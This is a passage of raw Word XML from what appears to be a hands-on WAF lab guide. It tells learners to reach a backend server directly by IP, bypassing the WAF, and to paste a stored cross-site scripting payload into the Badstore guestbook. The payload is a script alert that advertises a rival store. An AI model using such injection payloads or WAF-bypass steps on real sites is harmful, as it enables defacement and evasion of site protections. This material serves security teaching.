          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Get the  IP Address of the Backend Server ( the one you save and/or wrote down much earlier at the beginning of this lab ) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="16AED19E" w:rsidRDefault="32F6121D" w14:paraId="6F2A673F" w14:textId="5A42D037">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16AED19E" w:rsidR="20FA9A2A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Browse to that IP Address</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="5C7CB9EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, in other words going direct</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="69347D3A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ly to the server</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="5C7CB9EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="4EFDB705">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bypassing</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="5C7CB9EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the WAF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="16AED19E" w:rsidRDefault="32F6121D" w14:paraId="275260EE" w14:textId="156EA87A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16AED19E" w:rsidR="20FA9A2A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: in </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="4FE2C7FD">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">real life </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="3325F912">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the customer </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="4285B8E5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="3325F912">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> change their </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="5F9F7F5B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">inbound </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="3325F912">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>firewall rules to allow only the WAF</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="7982720D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-as-a-Service IP Ranges </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="4B0F9E12">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="64336A32">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prevent</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="4B0F9E12">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> anyone </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="6180F5D7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">bypassing </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="4B0F9E12">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the WAF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="16AED19E" w:rsidRDefault="32F6121D" w14:paraId="3685D8D4" w14:textId="773495B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16AED19E" w:rsidR="265FFCA8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on “Sign our Guestbook” </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="16AED19E" w:rsidRDefault="32F6121D" w14:paraId="3B727D0A" w14:textId="67B0DDE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16AED19E" w:rsidR="265FFCA8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enter your own first name for the name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="16AED19E" w:rsidRDefault="32F6121D" w14:paraId="6FB3B195" w14:textId="6D28DD66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16AED19E" w:rsidR="265FFCA8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter </w:t>
      </w:r>
      <w:hyperlink r:id="R29d7d17a946a40ad">
        <w:r w:rsidRPr="16AED19E" w:rsidR="265FFCA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>test@test.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="16AED19E" w:rsidR="265FFCA8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the email</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="265FFCA8" w:rsidP="4CBE4E3E" w:rsidRDefault="265FFCA8" w14:paraId="7A53B2A9" w14:textId="0AE54979">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="265FFCA8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For the comment field itself enter the following exactly</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="2F20B8E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="2F20B8E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>copy and paste</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="0F833DD3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="2F20B8E9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="2F20B8E9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="33D9FBA3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="2F20B8E9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="2F20B8E9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> prices are too high! </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="64BE3B91">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Go </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="2F20B8E9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to www.TerribleStore.com now</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="0F81AD8E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to buy all these items for less</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="2F20B8E9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="6DEBA683">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="6DEBA683">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="2F20B8E9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="2F20B8E9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="7DD4E0AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="4CBE4E3E" w:rsidRDefault="32F6121D" w14:paraId="04DD0510" w14:textId="592536C3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="05F61C0C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="11BAE490">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="7C6A8760">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When you paste, t</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="11BAE490">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">he double quotes </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="7A9A78EF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">may </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="11BAE490">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="2ABB397C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="0543580E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>changed</w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="18367A10">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
